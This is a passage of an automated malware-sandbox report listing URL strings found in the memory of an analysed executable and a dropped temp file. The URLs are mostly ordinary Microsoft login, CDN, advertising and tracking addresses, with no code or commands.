              Source: bhvF184.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
              Source: bhvF184.tmp.3.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0
              Source: bhvF184.tmp.3.drString found in binary or memory: https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?bbc9af5ecc12954d59c63a1771114562
              Source: 2T10XBqS6g.exe, 00000003.00000003.29905606658.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://eb2.3lift.com/sync?
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4b&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
              Source: bhvF184.tmp.3.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?6e329cf6426f83c8ee02e2bc96bdb46d
              Source: bhvF184.tmp.3.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?d2c6e729d235d3f335d1d4751bb8eb91
              Source: bhvF184.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhvF184.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhvF184.tmp.3.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: bhvF184.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: 2T10XBqS6g.exe, 00000003.00000003.29909567301.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908861604.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908947338.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909356057.0000000002319000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: 2T10XBqS6g.exe, 00000003.00000003.29910013869.0000000002317000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909567301.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909703869.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906461380.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906793776.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906663827.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29912965995.000000000231D000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908861604.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906730051.000000000231D000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906528564.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908947338.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909356057.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909941573.0000000002312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: bhvF184.tmp.3.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ib.3lift.com/sync.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ib.adnxs.com/
              Source: 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IMai
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IQAK
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: bhvF184.tmp.3.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
              Source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
              Source: 2T10XBqS6g.exe, 00000003.00000002.29914960133.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000002.29913752802.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913396163.000000000230F000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913153604.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913297087.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913101979.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913047994.000000000230C000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/
              Source: 2T10XBqS6g.exe, 00000003.00000002.29914960133.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913396163.000000000230F000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913153604.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913297087.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913101979.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913047994.000000000230C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: 2T10XBqS6g.exe, 00000003.00000002.29913752802.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/TI
              Source: 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29908947338.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909356057.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913047994.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909941573.0000000002312000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: 2T10XBqS6g.exe, 00000003.00000003.29906195815.000000000231D000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29912965995.000000000231D000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906730051.000000000231D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?route=C512_BAY&stsid=S.BC4837E917425070&uaid=d9
              Source: bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DhB9Gg0Em7s2jvLPGG9crywwB
              Source: bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604&scid=1&mkt=en-US&Platform=Windows10&clienti
              Source: bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?route=C512_BAY&uaid=b6de8762e4ae48b19a7d0d74ba392110
              Source: bhvF184.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/post.srf?mkt=en-US&platform=Windows10&id=80604&clientid=000000004807
              Source: 2T10XBqS6g.exe, 00000003.00000002.29914960133.0000000002311000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913396163.000000000230F000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913153604.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913297087.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913101979.000000000230C000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29913047994.000000000230C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: 2T10XBqS6g.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_n0x1vWZ9nk5hsb6ZgnoOdw2.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_VjBVCmhpr777yb9vmuAJ
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.sv
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b8006
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031be
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_uuJCSTysLQ9JSYLCWmrHPQ2.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_3J49gjRV3LSCVj6qj73kPQ2.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_0901d04301714f
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
              Source: bhvF184.tmp.3.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29760298435.0000000002918000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: bhvF184.tmp.3.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: 2T10XBqS6g.exe, 00000003.00000003.29906793776.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29906528564.0000000002B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
              Source: bhvF184.tmp.3.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
              Source: bhvF184.tmp.3.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
              Source: bhvF184.tmp.3.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhvF184.tmp.3.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
              Source: bhvF184.tmp.3.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
              Source: bhvF184.tmp.3.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhvF184.tmp.3.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
              Source: bhvF184.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
              Source: bhvF184.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
